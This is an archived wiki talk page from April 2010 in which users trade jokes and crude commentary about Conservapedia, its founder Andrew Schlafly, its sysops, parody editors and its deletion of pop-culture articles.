America agreed with me, yet since then the pendulum has swung and most (53%?) of America will say with a straight face that Fox News is fair and balanced. I can't help but worry that an uncareful but effective parodist might in the end do more harm than good. :/ Thoughts? --Opcn (talk) 00:05, 19 April 2010 (UTC) - Parodists are boring on CP. We want pure, unadulterated Andy insights! ħuman 00:13, 19 April 2010 (UTC) - I agree, but in order to make these insights from Andy blossom, it needs a bit of parodist pollen to stimulate it. NorsemanCyser Melomel 13:56, 19 April 2010 (UTC) - I'm 100% with Human. That said, do people really think I was a parodist/troll when I was on CP? If anything, I was trying to speak for the other side (i.e. reasonable people) on issues where I felt something needed to be said, but I'd never supported or advocated vandalism or parody because they're boring, unimaginative and lame. Even master parodists like Bugler can only hope to point out the validity of Poe's Law, and since that's long been established what's the point of any more? In the end, the best reason TK could scrape up for permabanning me and silencing my consistent display of reality's known liberal bias was over my membership here, and that's a coward's excuse. --SpinyNorman (talk) 01:24, 19 April 2010 (UTC) - Fancy a coward who debates poorly relying on a crummy and contrived excuse to block you. No, I don't think you were a parodist or troll at all. There are 2 brands of parody that I detest and you didn't do either. I hate this current course of terrorizing users and parroting TK's smug but substanceless patter and Andy's extremely unique worldview (nobody and I mean nobody could possibly agree with Andy on the wackier stuff he repeats, but here we have guys like JacobB putting banners chilling discussion on the relativity page). I guess you could cram Bugler into that category. He was odious.
Then there's the stupid obvious stuff like that clown's wiretap and abortion articles we were discussing earlier. Do you feel like you fit anywhere on these two extremes? I don't. That turned into a big back-pat. Cheers. 02:55, 19 April 2010 (UTC) Conservative Bible Project[edit] I'm amazed. Conservapedia has almost finished the New Testament in their Conservative Bible Project. This is not a good sign. Rodlen (talk) 00:33, 19 April 2010 (UTC) - It's not? X Stickman (talk) 01:02, 19 April 2010 (UTC) - It's a great sign. The systematic removal of compassion from the Bible is very funny.-- talk 01:34, 19 April 2010 (UTC) - I'm looking forward to being able to rebut CP arguments using their own bible. – Nick Heer 02:08, 19 April 2010 (UTC) - I'm with AD. it's a great sign. I'm waiting with baited breath to announce this grand achievement. Tetronian you're clueless 02:38, 19 April 2010 (UTC) - I'm intrigued, just what are you baiting your breath with? Lily Inspirate me. 07:39, 19 April 2010 (UTC) - I look forward to someone rebutting Andy with Ephesians 4:29. 31 and 32 aren't bad either. --Shagie (talk) 04:56, 19 April 2010 (UTC) - I wont say where, but I will mention that somewhere in the CBP I did backronym Colbert in and it is still standing. --Opcn (talk) 05:29, 19 April 2010 (UTC) - I added "singes" plus "e". But I won't say where. ħuman 08:09, 19 April 2010 (UTC) - Yeah, but what you don't know is that you were inspired by the holy spirit to do those things. You're working for Jesus on Satan's dime, suckers. ;) --JeevesMkII The gentleman's gentleman at the other site 12:08, 19 April 2010 (UTC) Standby for a Crap Joke from DeltaStar communications[edit] Isn't this a Sex Pistols song? DeltaStarSenior SysopSpeciationspeed! 09:53, 19 April 2010 (UTC) - Funny but the first two edits to that page made by user Newton and the following two by user Conservative. Coincidence? Lily Inspirate me. 09:58, 19 April 2010 (UTC) An Ed Poor favourite.....[edit] ...Heh.img Stayed like that for nearly 2 years. Acei9 10:02, 19 April 2010 (UTC) - Extra laughs hereimg. Acei9 10:04, 19 April 2010 (UTC) - Yes indeed. ħuman 10:26, 19 April 2010 (UTC) - Heh heh, good spot. Poor Ed Poor must have been distracted mid way through that last sentence. For two years. Good article though, they just need some other articles to wikilink to 'The closet' to make use of Ed scholarly efforts. DeltaStarSenior SysopSpeciationspeed! 10:36, 19 April 2010 (UTC) - It's nice to see that others nurtured his stub and grew it into an article. Isn't that what they call 'standing on the shoulders of giants'? Lily Inspirate me. 10:41, 19 April 2010 (UTC) - hahahaha :D rational ghey (talk) 14:05, 19 April 2010 (UTC) - (ec) Or giants were standing on Ed's shoulders. Or something like that. On a related note, here is your piece of hate for today: "[False outings] can ruin the reputation of an innocent, respectable person.". in·no·cent, adj: 1. not homosexual. [2] — Pietrow ☏ 14:10, 19 April 2010 (UTC) - I'm imagining Ed's inner monologue..."Homosexuality is bad, homosexuality is bad, homosexuality is bad, stub, stub stub, homosexuality is bad, homosexuality is bad, homosexuality is bad, stub, stub, stub, homosexuality is bad...hey, new user, stubs are bad! - Do as Ed says, not as we all know he probably does. — Sincerely, Neveruse / Talk / Block 14:29, 19 April 2010 (UTC) - Can't you get prosecuted in some countries for saying things like Ed has here? 
14:34, 19 April 2010 (UTC) - As a Freudian Psych student, I have to question this: "(Subject:) To Jack (Message:) Two heads are better than one - Ed Poor. [3] SirChuckBA product of Affirmative Action 16:19, 19 April 2010 (UTC) Re: the category, Ed (as you know) has these articles strewn all over that defied categorization, so I finally gave up. In theory he'd have one handy category that he could hypothetically go to and solve the problems, but (i think) I got a warning for vandalism after a couple of them so I gave up. 173.10.105.29 (talk) 17:21, 19 April 2010 (UTC) I know they don't like Richard Dawkins...[edit] ...but are they saying he's not humanimg any more?img Well done that vandal! proper capimg DeltaStarSenior SysopSpeciationspeed! 18:41, 19 April 2010 (UTC) - I'm amazed that the Dawkins picture was there for so long. Tetronian you're clueless 18:42, 19 April 2010 (UTC) - The Assfly also dishes out 5 year bansimg for pointing out that humans are primates.imgDeltaStarSenior SysopSpeciationspeed! 18:52, 19 April 2010 (UTC) - Capt. Mei (talk) 18:59, 19 April 2010 (UTC) - Somehow this reminds me of Keynesian beauty contest. K61824TK = Terry Koeckritz 19:51, 19 April 2010 (UTC) - I love how one of the categories is "Creations of God", but when you go to the category listing, only homo sapiens are listed. A backhanded way to admitting that perhaps all other life evolved? --BMcP - Just an astronomy guy 00:13, 20 April 2010 (UTC) Check the IP block log. Seems like they now have some tools to autoblock IP of a user when they block said user. ThiehTK = Terry Koeckritz 01:30, 20 April 2010 (UTC) - That's a standard MW feature - in fact that box is checked off by default. ħuman 01:39, 20 April 2010 (UTC) Whichever asshole rewrote my WIGO[edit] did a great job, thanks! --Opcn (talk) 05:46, 20 April 2010 (UTC) Translation[edit] I wonder what software Andy used to mangle up his anti-Brown commentimg? I wouldn't have commented on it if Herr Schlafly didn't make such a big issue of other people's spelling and grammar in the first place. Lily Inspirate me. 16:27, 19 April 2010 (UTC) - He dropped a D at the end of rescue. For some reason he hates the letter D. Totnesmartin (talk) 18:06, 19 April 2010 (UTC) - Dememoryholed CS Miller (talk) 18:16, 19 April 2010 (UTC) - Dememoryhole is a word he hates. As is Darwin. And Democrat. Totnesmartin (talk) 19:01, 19 April 2010 (UTC) - "Rescuing people IS DECEITFUL!" I just love the way Andy is meddling in British politics now. It gives him all new things to bitch about. Vulpius (talk) 21:40, 19 April 2010 (UTC) - Speaking of deceit, what's the betting that when the Tories almost inevitably win the election, Andy and Co. will be congratulating them on a marvellous victory for ConservatismTM, conveniently forgetting all the times they previously denounced the Tories as Not Real True Conservatives? --JeevesMkII The gentleman's gentleman at the other site 12:43, 20 April 2010 (UTC) - Vulpius, to be fair to Andypants, his read on Brown sending the Navy to rescue holidaymakers is spot on imo Iatrogenic (talk) 17:58, 20 April 2010 (UTC) Can people please effing stop highlighting new parodists[edit] It's getting boring for us and annoying for the parodists hoping to work their way up the greasy conservapedia pole (shudder). It seems to be happening more and more, yes - by all means discuss sysops whom you reckon to be Poeing it; but not some new user with a dozen edits. For eff's sake. DeltaStarSenior SysopSpeciationspeed! 21:58, 19 April 2010 (UTC) - THIS. 
Totnesmartin (talk) 22:02, 19 April 2010 (UTC) - Mine was a joke, sorry. Like I would be that dumb to create a username of my same real name & random letter. Candlewick 22:13, 19 April 2010 (UTC) - Man down. I was SamuelC. Rodlen (talk) 00:57, 20 April 2010 (UTC) - Nice work buddy! What do you think gave your game away? (PS. Don't say too much if it will thwart your future plans, TK reads here all the time) DeltaStarSenior SysopSpeciationspeed! 11:06, 20 April 2010 (UTC) - I think it was a mixture of three things: the focus on one subject (abortion and evolution), the shortness of the articles, and the fact that my parody articles were linked to here as parodies. Rodlen (talk) 22:39, 20 April 2010 (UTC) Andy's latest comment[edit] This is a bit too muchimg, even for me. Does the man refuse to ever leave the country? DickTurpis (talk) 00:32, 20 April 2010 (UTC) - ! yummy & honey(or marmalade) 00:36, 20 April 2010 (UTC) - Yeah, because I'm sure that's what they're thinking about... </sarcasm> Tetronian you're clueless 00:39, 20 April 2010 (UTC) - Wow, that comment is... wow... --Sid (talk) 00:40, 20 April 2010 (UTC) - Wow... So the Church of England both exist and not exist simultaneously? Schrödinger's Church FTW! K61824What is NOT going on? 01:32, 20 April 2010 (UTC) - Most American fundamentalists consider the Anglican Church to be irredeemably liberal and secular. Interestingly, the CP article on the Church of England is very neutral, so either Andy and Co. disagree or that article is stolen. Colonel of Squirrels白山羊不山羊。商讨。 04:38, 20 April 2010 (UTC) - I checked the CoE article and, aside from a section that would qualify as plagiarism in J-school, it doesn't appear to be stolen. An original article on CP which is informative and neutral? Well, I never. Colonel of Squirrels白山羊不山羊。商讨。 05:05, 20 April 2010 (UTC) - That comment is just... words cannot describe. He's getting worse every day. CrundyTalk nerdy to me 09:57, 20 April 2010 (UTC) It's a mistake to allow these people back in to the US. How are we to know that they've not been corrupted by liberal atheistic Brits to return home as Manchurian candidates? Andy, suggest they be dumped at sea! Ask me about your mother 10:45, 20 April 2010 (UTC) - The man is a numpty. However, crazy utterances like this are perfect for screencapping the whole page, and adding it to CP's WP article. That way, even more people get to see Andy's insane rantings. --PsyGremlinSermā! 10:53, 20 April 2010 (UTC) - That doesn't even make sense. How can there be lack of belief in gods everywhere you look? Hang on, I'm looking out my window now, and I can't see a church - does that mean I am looking at atheism? What a cockend. PS. I agree with Psy - this is exactly the kind of shit that needs adding to the WP article. DeltaStarSenior SysopSpeciationspeed! 11:11, 20 April 2010 (UTC) - Done. Nice thing is, Terry & Rob can't even moan about it, because all we've done is update the front page of CP on WP, which is the True and Only Word of Andy. Gotta love how the "news" section carries on for miles past the "info" section. --PsyGremlin講話 11:51, 20 April 2010 (UTC) - Psy, you left your IP on that screenshot. CrundyTalk nerdy to me 12:48, 20 April 2010 (UTC) "Stoopid" WIGO[edit] Worst story telling ever. Every link is to the same diff, and except the first, none "highlight" anything to make their point. Should probably be rewritten. 
ħuman 02:17, 20 April 2010 (UTC) - Whoever added it was trying to link directly to the citations, apparently unaware that the Capturebot doesn't work that way. Since all the citations are listed in the source code anyway, I think we can safely delete every link after the first. Colonel of Squirrels白山羊不山羊。商讨。 04:32, 20 April 2010 (UTC) - I went to the direct links, they failed also after the first one. It desperately needs rewriting by someone for whom 1) English is a first language and 2) wiki is a second. ħuman 04:36, 20 April 2010 (UTC) - So stop complaining and rewrite it already damnit!! Keegscee (talk) 04:37, 20 April 2010 (UTC) - There's so little to write. It's a crappy wigo, the person who first posts this crap should get their "joke" together. I removed the redundant links. By the way, "The intelligence of humans is rapidly declining" is at odds with IQ tests needing to be renormed every decade or so (scores are rising a few percent per decade). WIGO is lame because it just says "ha ha" and adds nothing. ħuman 04:41, 20 April 2010 (UTC) - I gave it my best shot. Keegscee (talk) 04:48, 20 April 2010 (UTC) - Thanks. I spend most of my time "rewriting" mainspace stuff. I expect wigos to tell a joke or story and make sense, so when I opened five tabs and they were all identical, well, you can understand my reaction. I hope your new version fares well and amuses people! ħuman 04:56, 20 April 2010 (UTC) - OK, well I'll take your suggestions and try to make my future WIGO entries a little better. I appreciate you editing it, I especially like the picture of Assfly at the end. I guess you guys don't get my sense of humour though because I thought it was funny the way I wrote it. I was trying to make the point that Assfly is saying people are stupid, but for proof only offers up unsupported footnotes, hence he's the stupid one (ha ha). That was the point and I thought that was actually funny, but I guess the execution didn't quite work out. And yes, English is my first language. Wiki is not a second though! Diavolos (talk) 13:57, 20 April 2010 (UTC) hehe irony[edit] was anybody else amused that the most recent criticized ken for a news item that used the same link 3 or 4 times, and the wigo below it had to be rewritten so that it wouldn't have the same link 3 or 4 times? 07:11, 20 April 2010 (UTC) - It's time to black up and have a pot party. Lily Inspirate me. 07:15, 20 April 2010 (UTC) - ROTFL! ħuman 10:05, 20 April 2010 (UTC) - Ours used the same link, albeit with "different" #reflinks, five times. Still, Ken's news thing screams "please give me national health care so I can afford my meds every month!" Ours was just short term epic fail. ħuman 10:07, 20 April 2010 (UTC) - It is, however, good to know that god continues to sit securely on his throne. Wouldn't want him to fall off and accidentally crush the earth with an elbow or something. If I may deign to offer some advice to the almighty, he ought to get up and have a walk around every now and then. Deep vein thrombosis is a killer, you know. --JeevesMkII The gentleman's gentleman at the other site 12:56, 20 April 2010 (UTC) It's TK, so it isn't really even worth mentioning, but still...[edit] Why is this news? A governor 3 months into term (still in the honeymoon period) has an approval rating of 53% and that's supposed to be exceptionally good? It's not too bad, I guess, but Obama was over 65% at this point in his term. Meh. It's TK. DickTurpis (talk) 17:49, 20 April 2010 (UTC) - Wake me up when Andy does something hilarious. 
— Sincerely, Neveruse / Talk / Block 18:02, 20 April 2010 (UTC) - TK's a troll who thrives on negative attention. Please to ignore unless he's addressing you directly. 18:08, 20 April 2010 (UTC) - I'd ignore him even then. Vulpius (talk) 18:20, 20 April 2010 (UTC) - That's the thing. If it were your standard "liberals are evil Nazis" thing I'd pass it off as regular TK. This is him trying to show how good his side is by trumpeting some lackluster statistics. It's almost counterproductive. I assumed Andy wrote it at first, because it's his home turf and he has a stake in the game there (especially in his recall campaign). This makes little sense. DickTurpis (talk) 19:08, 20 April 2010 (UTC) - It's actually mildly counter-Andy, as Andy has been tagging Christie with being a RINO for ... I don't know, some local New Jersey bullshit... 173.10.105.29 (talk) 19:31, 20 April 2010 (UTC) - I'm not surprised that he's tagged Christie as a RINO, since he's ignored social issues (which Andy loves) and has instead decided to focus on cutting every piece of state spending that isn't nailed to the floor. Tetronian you're clueless 20:06, 20 April 2010 (UTC) - Also don't forget that the poll he cites is Rasmussen, whose poll model counts a Democrat as only 3/5ths of a vote of a Republican. --Leotardo (talk) 21:03, 20 April 2010 (UTC) - That can be sound policy. In the UK there is a difference between what opinion (and even exit) polls say will happen, and what actually happens, normally under-reporting Tory votes. If this is known to happen, then it is wise to scale one party's intention-to-vote by the observed intention-to-vote to actual-vote ratio. 62.56.63.226 (talk) 21:42, 20 April 2010 (UTC) - That article is a real eye-opener. Thanks for posting it! Tetronian you're clueless 01:27, 21 April 2010 (UTC) Andrew Schlafly in the Princeton Alumni Weekly[edit] I finally had time to catch up on recent issues of the Princeton Alumni Weekly magazine, and I was astonished to find an interview with our favorite conservative in the February 24 issue. And the April 7 issue has responses from fellow graduates: "No more of Mr. Schlafly’s know-nothing brand of conservatism!" [4] "God did not bring a Bible into existence to primarily turn Americans or anyone into political conservatives." [5] "I find his replies such total nonsense that I have to ask: Is this a leg pull?" [6] "I learned about the use of B.C.E. and C.E. in Hebrew school. I had no idea I was attending an atheistic and liberal religious institution." [7] - Cuckoo (talk) 16:48, 19 April 2010 (UTC) - Nice find. The shirt!!! Well, someone finally took a halfway decent picture of Andy. — Sincerely, Neveruse / Talk / Block 16:58, 19 April 2010 (UTC) - That made me snort. --Shagie (talk) 17:29, 19 April 2010 (UTC) - Comments aren't available. Too bad. My Princeton alum friend is disappointed this hate-filled and deliberately ignorant man was interviewed as if he were just another Princeton grad. He's not. 17:58, 19 April 2010 (UTC) - "Having read the interview with Andrew Schlafly, I find his replies such total nonsense that I have to ask: Is this a leg pull?" 18:05, 19 April 2010 (UTC) "Logic" that goes in circles like this makes my head hurt. Internetmoniker (talk) 21:05, 19 April 2010 (UTC) Somewhat irrelevant question[edit] What is a leg pull, in that context, anyways? K61824"6+18=24" 23:18, 19 April 2010 (UTC) - "Pulling one's leg" means to prank someone, to tell them something that isn't true in jest.
ħuman 23:33, 19 April 2010 (UTC) - It's most common in Britain. I believe the American equivalent refers to "yank ones chain." SJ Debaser 11:10, 20 April 2010 (UTC) - Also "pull one's plonker" or "tug one's todger" or erm I'd better stop now before I go too far off topic DeltaStarSenior SysopSpeciationspeed! 11:23, 20 April 2010 (UTC) - To "yank one's chain" is to provoke someone into a response.... it's not quite the same as pulling a leg, which involves liberal deceit. 194.6.79.200 (talk) 12:49, 20 April 2010 (UTC) - See also: "pull the other one (it's got bells on)" 12:54, 20 April 2010 (UTC) yummy & honey(or marmalade) (unDent) Old practical joke to pull on a friend. Tell them, You know, the strangest thing happened to me today. I was in the checkout line at the grocery store, and I noticed there was an elderly woman in front of me, and she was crying. I said to her, "Ma'am, is everything all right?" She looked back, and said, "you look just like my son. He died about three years ago." "Oh, I'm so sorry to hear that." "Would you mind if I show you his picture?" "Well, okay..." She showed me the picture, and I didn't think I looked like him, but I didn't want to be mean to the woman, so I said, "Yes, there is a resemblance." "Thank you," she said. "Could you do one more thing for me? Could you just call me, 'Mom'?" I thought that was pretty odd, but I felt sorry for her, so I said, "All right... Mom." She finished at the stand, and then the cashier rang up my groceries, and said "that'll be $235, please." "What????" I asked. "There's only about fifty bucks worth here!" The cashier said, "your mother said you'd pay for hers, too!" "Wait just a minute!" I said, and ran out into the parking lot. I saw the old woman, and she was getting into her car. I managed to get close enough to grab her leg, and started pulling it and pulling it.... just like I'm pulling yours now. #rimshot# MDB (talk) 11:39, 21 April 2010 (UTC) Oh Ken![edit] Dawkins article researchimg Doesn't Ken just make you laugh? The idea of someone like him doing research, I mean. And still the bunny down a hole piccy there. 13:50, 20 April 2010 (UTC) yummy & honey(or marmalade) - Ouch! Ouch! Ken is just so embarrassing that I really feel sorry for him. I mean, here's a 40-something guy acting and writing like a remedial class 13-year old (apologies if that sounds un-PC) but he obviously has some talent in an autistic way by searching through mountains of quotes or locating irrelevant YouTube videos. What can his poor mum think of him? She must be an absolute angel to still keep him at home when most of his peers have gone out into the world and got married. Lily Inspirate me. 14:18, 20 April 2010 (UTC) - It's nice to see him with a hobby, since he always struggled to make friends. Hmm, must stock-up on tissues. We always seem to run out of tissues whenever the History Channel has a special on Nazis. Maybe I'll see if he can spend the weekend at that nice Mr Andy's house. Ken was so excited that for a week afterwards he only left his room to fetch biscuits, 7-Up and more tissues for that terrible cold he always seems to have. (Channelling Ken's mum) -- Ask me about our love 15:20, 20 April 2010 (UTC) - The bunny is supposed to be Dawkins? It looks really scared. Perhaps it's a bit of psychological projection... Tetronian you're clueless 20:09, 20 April 2010 (UTC) - When Ken goes on these forays I see Dawkins as King Arthur in MP&THG with the limbless Black Knight of fundamentalism screaming "come back and fight you coward". 
But of course, in reality it is Ken who shies away from debate. Either by locking his articles at CP, or firing a salvo on a talk page/forum and refusing to continue with the thread when he has been pwned. His habitual deletions of stuff are really a badge of cowardice, in that he doesn't have the cojones to leave his ramblings and outbursts in public view. With the Library of Congress supposedly archiving Twitter tweets it would be funny to have access to Ken's bleats. (Lame spur of the moment joke: The Conservapedia version of Twitter could be called Bitter and their postings would be bleats.) Lily Inspirate me. 03:04, 21 April 2010 (UTC) Speaking of parodists, doesn't anyone wonder why an alleged resident of a small city in the Yucatan is editing articles about American synagogues. ...[edit] [8] and a host of subjects that would be beyond the interest of a retired Mexican academic unless he has particularly urbane interests. Discuss. 14:50, 20 April 2010 (UTC) - Are you outing parodists again Nutty? CrundyTalk nerdy to me 14:52, 20 April 2010 (UTC) - Yeah, I'm on a roll. You're next. 14:55, 20 April 2010 (UTC) - What a coincidence, my old amigo Joaquín from Campeche. I somehow got added to his address book and now receive spam emails because his account has been hacked or infected. Of course these mailings are also sent out to his fellow CP sysops but with all their email addresses in plain view. It's interesting to find how many different ones they use. Especially when Andy mistrusts anyone with a gmail/hotmail email address. They're all wankers and I'm glad that I don't have any dealings with them any more. Silly twit (talk) 15:09, 20 April 2010 (UTC) - I don't wear a sock while having funtime with CP. CrundyTalk nerdy to me 15:10, 20 April 2010 (UTC) - You should wear a rubber. That place is a cesspit of infectious diseases like YEC, xenophobia, homophobia, and racism. 15:13, 20 April 2010 (UTC) - How does rubber prevent transmission of those diseases? K61824Ahh! my eyes!! 15:21, 20 April 2010 (UTC) - We're playing word games. Socks cover your feet but have nothing to do with the internet. Condoms (rubbers) cover your knob, which also has nothing to do with the internet, but don't protect against diseases of the mind. 15:26, 20 April 2010 (UTC) - Clearly one of us is using the internet wrong NR.--Opcn (talk) 18:29, 20 April 2010 (UTC) - Why are you saying my knob has nothing to do with the internet? — Sincerely, Neveruse / Talk / Block 18:32, 20 April 2010 (UTC) - ERrr, I was referring to Thieh's knob, not either of yours. Your knobs can continue being famous on the internet. 18:49, 20 April 2010 (UTC) - If anyone is interested, I'll be on chatroulette. — Sincerely, Neveruse / Talk / Block 19:00, 20 April 2010 (UTC) - I hadn't heard of that site until my friend showed it to me a month or so ago... I didn't care for it. SJ Debaser 19:06, 20 April 2010 (UTC) - I recently heard about it in a NYTimes Op-Ed piece, which described it as creepy and pretty pointless. Tetronian you're clueless 20:07, 20 April 2010 (UTC) - So a lot like the NYTimes Op-Ed page, then. --The Emperor Kneel before Zod! 22:51, 20 April 2010 (UTC) - David Thorne didn't care much for it either. CrundyTalk nerdy to me 07:53, 21 April 2010 (UTC) How The Mind Works: Andy[edit] Not earth-shattering by any means, but this little comment by Andy really sums up the way his mind (doesn't) work. Andy and DanP are debating how William Penn (founder of Philly) came up with the name "Philadelphia".
So Andy sez he'll do a little research, but that "anti-Christian bias from internet searching may make the truth harder to find than usual". I mean, really? Andy thinks that there's some sort of anti-Christian Internet cabal censoring search engine results to keep Christian history buried? And what's funny, too, is that the answer to the query is that Penn pinched the name "Philadelphia" from a city of the same name mentioned in Revelation. You'da thunk Mister Bible Genius Andy Schlafly--who claims to have studied the Bible cover to cover--woulda known that...--WJThomas (talk) 02:07, 21 April 2010 (UTC) - Andy's position on the Bible strikes me as untenable. On the one hand, he claims to be knowledgeable enough to "translate" it effectively. On the other hand, he is emphatically not an expert...so what is he? In his mind, he's some kind of ubermensch who is still technically an amateur. But, in reality, he is obviously nowhere close to being a Bible scholar. Tetronian you're clueless 02:31, 21 April 2010 (UTC) - I have always admired those people who could remember a book verbatim from cover to cover. Unless you master memory tricks to do so it is largely a question of leaning by rote. So have all these bible-spouting fundamentalists memorised the entire book? I suspect not, they probably focus on the mainstream stories, essential teachings and/or those bits that support a particular viewpoint, especially those backed up with eternal damnation, brimstone and hellfire. Lily Inspirate me. 02:45, 21 April 2010 (UTC) Phil·a·del·phi·a 1. An ancient city of Asia Minor northeast of the Dead Sea in modern-day Jordan. The chief city of the Ammonites, it was enlarged and embellished by Ptolemy II Philadelphus (285-246 b.c.) and named in honor of him. Amman, the capital of Jordan, is now on the site. 2. The largest city of Pennsylvania, in the southeast part of the state on the Delaware River. It was founded as a Quaker colony by William Penn in 1681 on the site of an earlier Swedish settlement. The First and Second Continental Congresses (1774 and 1775-1776) and the Constitutional Convention (1787) met in the city, which served as the capital of the United States from 1790 to 1800. Etymology: Gr philadelphia, brotherly love < philos, loving + adelphos, brother - Refugeetalk page 05:32, 21 April 2010 (UTC) - "anti-Christian bias from internet searching may make the truth harder to find than usual" cracked me up. ħuman 07:15, 21 April 2010 (UTC) - It is an amazing example of Andy's final paranoid days in the bunker. I imagine him calling tech support, claiming that atheists are preventing his modem from getting a dial tone. Sure it could be the 5 phones and numerous splitters overloading his line, but it seems more likely that those darn atheists are to blame. Andy, you fail at Bible and Google! Ask me about our gyroscope 18:48, 21 April 2010 (UTC) Fatwah?[edit] TK Uploads and inserts a piccy of the Prophet. Wonder where he found it? 07:18, 21 April 2010 (UTC) yummy & honey(or marmalade) - Where you found it, at least. The 'source' says they "found it on the internet" so I don't think your hunt is over yet! ħuman 07:46, 21 April 2010 (UTC) - Actually the Great Klepto says he found it here. Lily Inspirate me. 09:24, 21 April 2010 (UTC) AllenShaw[edit] Whoever it is, knock it off. Do you really want Ed Poor classics deleted? Or are you just trying to goad Ed into defending their existence? As funny as that would be, some of them are just too good to lose. Please stop. Or at least be very careful. 
— Sincerely, Neveruse / Talk / Block 15:53, 21 April 2010 (UTC) - I say nuke the bastards. Let Ed face the truth. EddyP (talk) 15:57, 21 April 2010 (UTC) - Well, it'll be interesting to see them explain that thisimg isn't pop culture, just because Creepy Uncle Ed masturbated while watchingwrote it. --PsyGremlinFale! 16:05, 21 April 2010 (UTC) - I love this edit commentimg. How does this retard take himself seriously? DickTurpis (talk) 16:46, 21 April 2010 (UTC) - - Proxy link, Dick. I fixed...P-Foster (talk) 16:50, 21 April 2010 (UTC) Nothin' like censorship[edit] What an awesome deletion log they got goin' on over there at CP... rational ghey (talk) 18:21, 21 April 2010 (UTC) - I'm just waiting for them to delete The Beatles. DickTurpis (talk) 18:46, 21 April 2010 (UTC) - It's not quite on the same level as The Beatles, but deleting Nirvana was pretty bad. Keegscee (talk) 18:49, 21 April 2010 (UTC) - Pah, those guys weren't even as popular as Jesus. *Leaves to see if CP has an article for Stryper* Ask me about our alpaca sandwich 18:53, 21 April 2010 (UTC) - Pretty sure they deleted that in the screenshot wigo. They also deleted Genesis. It's like... why? ;_____________; Mei (talk) 18:57, 21 April 2010 (UTC) - Deletion is the new parody. Tetronian you're clueless 02:17, 22 April 2010 (UTC) Merging dup vote counts[edit] I've just deleted a duplicated WIGO entry. Is there any way to add the votes for the second one to the first? CS Miller (talk) 18:33, 21 April 2010 (UTC) - One despairs of the reading ability of people: "Don't remove entries." it says above the edit box. 18:52, 21 April 2010 (UTC) yummy & honey(or marmalade) - OOPS: Sorry CSM You didn't remove it: you commented it out Many apologies. No don't think there is any way of adding the votes. yummy & honey(or marmalade) 18:56, 21 April 2010 (UTC) - Don't worry Toastie; I should have been clearer that I'd just commented it out, rather than removed it from the article. The voting for the second WIGO was +2; not sure what the total votes was, if there is even an easy way to find out. CS Miller (talk) 20:05, 21 April 2010 (UTC) Karajou Strikes Back[edit] Karajou's been on a tear over the last hour, pulling speedy delete tags off of articles. I guess he figured out AllenShaw's scheme to trick CP into committing suicide. The de-tagged pages were all anime and movie articles and Uncle Ed's weird tech support stuff. And thus, CP's criteria for determining "pop culture" become ever more arbitrary. Colonel of Squirrels白山羊不山羊。商讨。 18:55, 21 April 2010 (UTC) - I've always thought that (metaphorically speaking) Karajou is the smallest man on the wiki. He just barely beats out Jinxy. — Sincerely, Neveruse / Talk / Block 18:57, 21 April 2010 (UTC) Andy, Cameron and eggs[edit] Not WIGO worthy, but apparently David Cameron got hit by an egg, prompting Andy to write on the News Feed Liberal values are great, aren't they? The reaction by the liberal media and police would have been very different if an egg had been thrown at a liberal politician. It really, really wouldn't. Remember when John Prescott got egged and he decked the guy that did it? Or how about Lord Mandelson getting green crap thrown all over him last year? SJ Debaser 19:20, 21 April 2010 (UTC) - Well I doubt Andy know the first thing about British culture, history, or politics. --BMcP - Just an astronomy guy 19:36, 21 April 2010 (UTC) - I think that we generally piss ourselves when any politician is egged or slimed. 
yummy & honey(or marmalade) 19:42, 21 April 2010 (UTC) - Cameron just lost points by not decking the guy, basically - David Gerard (talk) 19:54, 21 April 2010 (UTC) - Err. The Times is right-leaning (but not as much as the Torygraph). CS Miller (talk) 20:28, 21 April 2010 (UTC) - The Times is a Murdoch paper, and, as such - much as 'Merkins will have experienced from the Wall Street Journal since he bought it - The Sun with bigger words and less tits. Murdoch is not happy with recent polls. But this is veering even more off-topic than usual ... - David Gerard (talk) 20:43, 21 April 2010 (UTC) - The politics of The Times is whatever bolsters the greater profits of News International or related Murdoch-owned companies. Lily Inspirate me. 00:50, 22 April 2010 (UTC) - Mmmm, eggs. Personally I prefer omelettes or over-easy eggs on toast. ħuman 01:37, 22 April 2010 (UTC) - Yuh, that's what I said ;-) Also, The Sun (hence directive from Murdoch) is officially backing the Tories - David Gerard (talk) 06:06, 22 April 2010 (UTC) Birther state[edit] WIGO world: "Arizona (motto:"God Enriches") becomes the "Birther" state." Isn't there someone we all know who lives in Az? 20:24, 22 April 2010 (UTC) yummy & honey(or marmalade) - Since none of the CP Admins live there, move to Saloon or WIGO Talk:World? K61824Looking for potion recipes 20:27, 22 April 2010 (UTC) - Oops Confusing my states: Nevada =/= Arizona. Please ignore this section. 20:30, 22 April 2010 (UTC) yummy & honey(or marmalade) Someone tell this to Andy (Lenin birthday WIGO)[edit] First Earth Day is observed in 1970, exactly the 100th birthday of Vladimir Lenin. Bonus: Jane Froman Died on the 10th Earth day. More Hollywood values for you. I am interested in what kind of lulz it leads to. K61824"6+18=24" 20:30, 22 April 2010 (UTC) Yes, I wonder if they will note this.-- talk 23:52, 22 April 2010 (UTC) Probably, they will.-- talk 23:53, 22 April 2010 (UTC) Cp Sysops are bored[edit] They must be bored at CP these days. With so few new users joining, there are not enough to block to keep them busy, so they've started deleting accounts of old users who were already blocked. (Causing red links all over pages) and deleting users who had never edited or had few edits. Then they actually began re-creating User pages, just to delete them again. (Hojimachong?) Now they are deleting tons of pages full of content: rock bands, singers, video games, movies, and anything else that they feel like calling "pop culture". The site is growing rapidly? Soon there will be nothing left of the wiki at all. Refugeetalk page 06:14, 21 April 2010 (UTC) - Yeah. DouglasA did some good work tonight. He's got to be careful, though, because he's drawing a lot of attention to himself. Keegscee (talk) 06:19, 21 April 2010 (UTC) - Who was that band Terry Koekritz allegedly sat in on sessions of? Hope they haven't been "popcultured" into oblivion. (I note Ken checked a couple of Xtian ones [restore/redelete]) 06:23, 21 April 2010 (UTC) yummy & honey(or marmalade) - Do you think it ever occured to them to start improving the quality of some of their lesser articles via research? That would fill in sometime. 
